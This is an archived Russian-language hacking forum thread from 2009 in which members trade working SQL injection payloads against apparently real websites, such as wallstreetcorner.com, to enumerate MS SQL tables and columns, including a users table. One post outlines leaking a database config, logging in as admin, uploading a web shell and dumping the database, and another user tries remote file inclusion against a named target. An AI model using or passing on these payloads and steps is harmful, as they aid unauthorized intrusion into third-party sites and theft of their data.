ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.11.2009, 20:13
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от YuNi|[c
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations%00
|
|
|
10.11.2009, 12:48
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
Зайди в тему "Энциклопедия уязвимых скриптов" да и посмотри
(имхо sql-inj чаще встречается)
на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
Почему это?
1. Сливаешь конфиг файл для подкл. к БД, смотришь пароль, пробуешь зайти под админом и под паролем который был в конфиге к примеру на форум, если захошел то заливаешь шелл и потом сливаешь БД через шелл
2. Если сервис sql доступен из интернета то просто подкл. к нему с помощью какой либо утилиты (я для этого юзаю NetCat)
про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ...
Ну ты думаешь своей головою? Тебе надо искать мануалы по lfi/rfi а не уязвимости в движках (я понимаю что хочется понять вот так сразу но надо с мануалов начинать)
|
|
|
|
10.11.2009, 12:48
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
перепутал))
суть в том что сайт сам не пашет.
Последний раз редактировалось Krist_ALL; 10.11.2009 в 12:51..
|
|
|
|
10.11.2009, 18:57
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
http://www.site.com/ShopList.asp?Cat=-34+union+select+1,2,3,4,5,6,table_name,8+from+info rmation_schema.tables--
Получил таблицу MyAccessLog БД MS SQL,в мускуле используется лимит,а сдесь как сделать чтобы получить имена остальных таблиц?Пробовал как в статьях 1 or 1=@@version-- и тд,запросы такие неработают.
|
|
|
|
10.11.2009, 19:32
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
2Fed123,
cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema.tables)--
Хм ну как-то так вроде, поэкспериментируй
|
|
|
|
10.11.2009, 20:27
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Сообщение от ElteRUS
2Fed123,
cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema.tables)--
Хм ну как-то так вроде, поэкспериментируй
Спасибо,все получилось.Теперь пролема с колонками 
При запросе
Код:
-34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
|
|
|
|
10.11.2009, 21:01
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от 2Fed123
Спасибо,все получилось.Теперь пролема с колонками
При запросе
Код:
-34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
Код:
-34+UNION+SELECT+1,2,3,4,5,6, COLUMN_NAME,8+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’MyUsers’ +LIMIT+1,1--
почитать можно тут:
https://forum.antichat.ru/thread43966.html
|
|
|
|
10.11.2009, 19:44
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
where table_name NOT IN ('table_name1')
|
|
|
|
10.11.2009, 21:23
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://wallstreetcorner.com/ss2.html?Symbol=%'%20union%20select%201,2,3,4,5,6, 7,8,'Privetttt',10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46%20from%20Situations%00
Только понта с этого нету.
Выводится в адресную строку браузера 9 поле где привет написано)
Последний раз редактировалось ILYAtirtir; 10.11.2009 в 21:26..
|
|
|
|
11.11.2009, 00:11
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru
на мой сайт залил скрипт:
Код:
<?
..
Include ("$page.php");
…
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149
мой код на сервере под названием ххх.php.
я переделываю ссылку так:
http://www.123.ru/index.php?action= http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id= http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.
Я ошибку делаю, или просто на сайте фильтровывается ?
P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.jpg?1677127){kind=avatar}
![Аватар для [aywo]](/avatars/avatar32504.jpg?1677281){kind=avatar}
Похожие темы
Комбинированный вид
